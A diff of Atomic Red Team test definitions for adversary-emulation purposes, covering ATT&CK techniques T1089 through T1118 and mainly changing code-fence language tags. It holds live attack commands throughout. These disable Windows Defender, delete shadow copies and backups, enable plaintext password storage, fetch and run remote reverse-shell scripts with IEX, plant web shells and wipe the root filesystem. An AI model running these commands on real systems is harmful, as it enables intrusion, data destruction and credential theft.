Set-MpPreference -DisableScriptScanning 0
@@ -508,14 +542,16 @@ Attempting to disable scheduled scanning and other parts of windows defender atp
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
```
#### Cleanup Commands:
```
```cmd
sc start WinDefend
sc config WinDefend start=enabled
```
@@ -535,12 +571,14 @@ Disable Windows Defender from starting after a reboot
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
```
#### Cleanup Commands:
```
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```
@@ -560,7 +598,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
@@ -571,7 +611,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
```
@@ -593,7 +633,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
atomics/T1090/T1090.md
+8 -4
View File
@@ -31,12 +31,14 @@ Note that this test may conflict with pre-existing system configuration.
#### Attack Commands: Run with `sh`!
```
```sh
export #{proxy_scheme}_proxy=#{proxy_server}
```
#### Cleanup Commands:
```
```sh
unset http_proxy
unset https_proxy
```
@@ -64,12 +66,14 @@ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
```
#### Cleanup Commands:
```
```powershell
netsh interface portproxy delete v4tov4 listenport=#{listenport}
```
atomics/T1093/T1093.md
+4 -2
View File
@@ -26,14 +26,16 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
#### Attack Commands: Run with `powershell`!
```
```powershell
. $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
```
#### Cleanup Commands:
```
```powershell
Stop-Process -Name "#{spawnto_process_name}"
```
atomics/T1095/T1095.md
+12 -5
View File
@@ -29,7 +29,9 @@ refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-ic
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}
```
@@ -60,20 +62,23 @@ nc -l -p <port>
#### Attack Commands: Run with `powershell`!
```
```powershell
cmd /c #{ncat_exe} #{server_ip} #{server_port}
```
#### Dependencies: Run with `powerShell`!
##### Description: ncat.exe must be available at specified location (#{ncat_exe})
##### Check Prereq Commands:
```
```powerShell
if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powerShell
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
@@ -106,7 +111,9 @@ nc -l -p <port>
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}
```
atomics/T1096/T1096.md
+7 -3
View File
@@ -30,7 +30,9 @@ Execute from Alternate Streams
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
@@ -66,7 +68,9 @@ Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
#### Attack Commands: Run with `powershell`!
```
```powershell
if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
@@ -74,7 +78,7 @@ Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,
```
#### Cleanup Commands:
```
```powershell
Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
```
atomics/T1097/T1097.md
+3 -1
View File
@@ -29,7 +29,9 @@ Similar to PTH, but attacking Kerberos
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mimikatz # kerberos::ptt #{user_name}@#{domain}
```
atomics/T1098/T1098.md
+3 -1
View File
@@ -29,7 +29,9 @@ Manipulate Admin Account Name
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
atomics/T1099/T1099.md
+21 -7
View File
@@ -34,7 +34,9 @@ Stomps on the access timestamp of a file
#### Attack Commands: Run with `sh`!
```
```sh
touch -a -t 197001010000.00 #{target_filename}
```
@@ -59,7 +61,9 @@ Stomps on the modification timestamp of a file
#### Attack Commands: Run with `sh`!
```
```sh
touch -m -t 197001010000.00 #{target_filename}
```
@@ -87,7 +91,9 @@ Sudo or root privileges are required to change date. Use with caution.
#### Attack Commands: Run with `sh`!
```
```sh
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
@@ -119,7 +125,9 @@ This technique was used by the threat actor Rocke during the compromise of Linux
#### Attack Commands: Run with `sh`!
```
```sh
touch -acmr #{reference_file_path} {target_file_path}
```
@@ -147,7 +155,9 @@ This technique was seen in use by the Stitch RAT.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
@@ -175,7 +185,9 @@ This technique was seen in use by the Stitch RAT.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
@@ -203,7 +215,9 @@ This technique was seen in use by the Stitch RAT.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
atomics/T1100/T1100.md
+7 -4
View File
@@ -27,24 +27,27 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
xcopy #{web_shells} #{web_shell_path}
```
#### Cleanup Commands:
```
```cmd
del #{web_shell_path} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: Web shell must exist on disk at specified location (#{web_shells})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{web_shells}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
atomics/T1101/T1101.md
+3 -1
View File
@@ -22,7 +22,9 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
atomics/T1102/T1102.md
+8 -4
View File
@@ -25,12 +25,14 @@ Download data from a public website using command line
#### Attack Commands: Run with `command_prompt`!
```
```cmd
bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
```
#### Cleanup Commands:
```
```cmd
del %TEMP%\bitsadmindownload.html >nul 2>&1
```
@@ -49,7 +51,9 @@ Multiple download methods for files using powershell
#### Attack Commands: Run with `powershell`!
```
```powershell
Invoke-WebRequest -Uri www.twitter.com
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
$wc = New-Object System.Net.WebClient
@@ -57,7 +61,7 @@ $T1102 = $wc.DownloadString("https://www.aol.com/")
```
#### Cleanup Commands:
```
```powershell
Clear-Variable T1102 >$null 2>&1
```
atomics/T1103/T1103.md
+3 -1
View File
@@ -24,7 +24,9 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg.exe import #{registry_file}
```
atomics/T1105/T1105.md
+34 -12
View File
@@ -47,7 +47,9 @@ Utilize rsync to perform a remote file copy (push)
#### Attack Commands: Run with `bash`!
```
```bash
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```
@@ -75,7 +77,9 @@ Utilize rsync to perform a remote file copy (pull)
#### Attack Commands: Run with `bash`!
```
```bash
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```
@@ -103,7 +107,9 @@ Utilize scp to perform a remote file copy (push)
#### Attack Commands: Run with `bash`!
```
```bash
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
@@ -131,7 +137,9 @@ Utilize scp to perform a remote file copy (pull)
#### Attack Commands: Run with `bash`!
```
```bash
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -159,7 +167,9 @@ Utilize sftp to perform a remote file copy (push)
#### Attack Commands: Run with `bash`!
```
```bash
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
@@ -187,7 +197,9 @@ Utilize sftp to perform a remote file copy (pull)
#### Attack Commands: Run with `bash`!
```
```bash
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -213,7 +225,9 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
@@ -239,7 +253,9 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
#### Attack Commands: Run with `powershell`!
```
```powershell
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
@@ -271,7 +287,9 @@ This technique is used by Qbot malware to download payloads.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
@@ -298,12 +316,14 @@ This technique is used by multiple adversaries and malware families.
#### Attack Commands: Run with `powershell`!
```
```powershell
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{destination_path} -Force -ErrorAction Ignore
```
@@ -327,7 +347,9 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
atomics/T1107/T1107.md
+42 -14
View File
@@ -50,7 +50,9 @@ Delete a single file from the temporary directory
#### Attack Commands: Run with `sh`!
```
```sh
rm -f #{file_to_delete}
```
@@ -75,7 +77,9 @@ Recursively delete the temporary directory and all files contained within it
#### Attack Commands: Run with `sh`!
```
```sh
rm -rf #{folder_to_delete}
```
@@ -100,7 +104,9 @@ Use the `shred` command to overwrite the temporary file and then delete it
#### Attack Commands: Run with `sh`!
```
```sh
shred -u #{file_to_shred}
```
@@ -120,7 +126,9 @@ Delete a single file from the temporary directory using cmd.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt >nul 2>&1
```
@@ -141,7 +149,9 @@ Recursively delete the temporary directory and all files contained within it usi
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
```
@@ -162,7 +172,9 @@ Delete a single file from the temporary directory using Powershell
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
```
@@ -188,7 +200,9 @@ Recursively delete the temporary directory and all files contained within it usi
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
```
@@ -209,7 +223,9 @@ Delete all volume shadow copies with vssadmin.exe
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
vssadmin.exe Delete Shadows /All /Quiet
```
@@ -229,7 +245,9 @@ Delete all volume shadow copies with wmic
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wmic shadowcopy delete
```
@@ -249,7 +267,9 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
@@ -270,7 +290,9 @@ This test deletes Windows Backup catalogs.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wbadmin delete catalog -quiet
```
@@ -290,7 +312,9 @@ This test deletes the entire root filesystem of a Linux system. This technique w
#### Attack Commands: Run with `bash`!
```
```bash
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
@@ -310,7 +334,9 @@ Delete a single prefetch file. Deletion of prefetch files is a known anti-foren
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
```
@@ -333,7 +359,9 @@ https://twitter.com/SBousseaden/status/1197524463304290305?s=20
#### Attack Commands: Run with `powershell`!
```
```powershell
if ($env:os -eq "Windows_NT") {
New-Item $env:TEMP\TeamViewer_54.log
Remove-Item $env:TEMP\TeamViewer_54.log
atomics/T1110/T1110.md
+3 -1
View File
@@ -51,7 +51,9 @@ Creates username and password files then attempts to brute force on remote host
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
atomics/T1112/T1112.md
+27 -13
View File
@@ -35,12 +35,14 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
#### Cleanup Commands:
```
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
```
@@ -60,12 +62,14 @@ CMD is ran as Administrative rights.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
```
#### Cleanup Commands:
```
```cmd
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
```
@@ -84,7 +88,9 @@ Modify a registry key of each user profile not currently loaded on the machine u
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
@@ -155,12 +161,14 @@ Sets registry key that will tell windows to store plaintext passwords (making th
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
```
@@ -186,7 +194,9 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
#### Attack Commands: Run with `powershell`!
```
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
@@ -195,7 +205,7 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
```
@@ -215,7 +225,9 @@ https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterpris
#### Attack Commands: Run with `powershell`!
```
```powershell
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
@@ -225,7 +237,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
```
#### Cleanup Commands:
```
```powershell
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse -ErrorAction Ignore
```
@@ -245,12 +257,14 @@ placing javascript in registry for persistence
#### Attack Commands: Run with `powershell`!
```
```powershell
New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
```
atomics/T1113/T1113.md
+12 -4
View File
@@ -36,7 +36,9 @@ Use screencapture command to collect a full desktop screenshot
#### Attack Commands: Run with `bash`!
```
```bash
screencapture
```
@@ -61,7 +63,9 @@ Use screencapture command to collect a full desktop screenshot
#### Attack Commands: Run with `bash`!
```
```bash
screencapture -x
```
@@ -86,7 +90,9 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
#### Attack Commands: Run with `bash`!
```
```bash
xwd -root -out #{output_file}
xwud -in #{output_file}
```
@@ -112,7 +118,9 @@ Use import command to collect a full desktop screenshot
#### Attack Commands: Run with `bash`!
```
```bash
import -window root
```
atomics/T1114/T1114.md
+4 -2
View File
@@ -32,12 +32,14 @@ Search through local Outlook installation, extract mail, compress the contents,
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
```
#### Cleanup Commands:
```
```cmd
del #{output_file} >nul 2>&1
```
atomics/T1115/T1115.md
+7 -3
View File
@@ -27,14 +27,16 @@ Add data to clipboard to copy off or execute commands from.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
```
#### Cleanup Commands:
```
```cmd
del %temp%\T1115.txt >nul 2>&1
```
@@ -53,7 +55,9 @@ Utilize PowerShell to echo a command to clipboard and execute it
#### Attack Commands: Run with `powershell`!
```
```powershell
echo Get-Process | clip
iex Get-Clipboard
```
atomics/T1117/T1117.md
+15 -7
View File
@@ -32,20 +32,23 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Attack Commands: Run with `command_prompt`!
```
```cmd
regsvr32.exe /s /u /i:#{filename} scrobj.dll
```
#### Dependencies: Run with `powershell`!
##### Description: Regsvr32.exe must exist on disk at specified location (#{filename})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{filename}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/src/RegSvr32.sct" -OutFile "#{filename}"
```
@@ -69,7 +72,9 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Attack Commands: Run with `command_prompt`!
```
```cmd
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
@@ -94,20 +99,23 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
#### Attack Commands: Run with `command_prompt`!
```
```cmd
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
```
#### Dependencies: Run with `powershell`!
##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{dll_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
```
atomics/T1118/T1118.md
+56 -32
View File
@@ -41,7 +41,9 @@ Executes the CheckIfInstallable class constructor runner instead of executing In
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -69,7 +71,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -78,14 +80,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -112,7 +115,9 @@ Executes the InstallHelper class constructor runner instead of executing Install
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -142,7 +147,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -151,14 +156,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -185,7 +191,9 @@ Executes the installer assembly class constructor.
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -215,7 +223,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -224,14 +232,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -258,7 +267,9 @@ Executes the Install Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -288,7 +299,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -297,14 +308,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -331,7 +343,9 @@ Executes the Uninstall Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -361,7 +375,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -370,14 +384,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -404,7 +419,9 @@ Executes the Uninstall Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -434,7 +451,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -443,14 +460,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -477,7 +495,9 @@ Executes the Uninstall Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -507,7 +527,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -516,14 +536,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
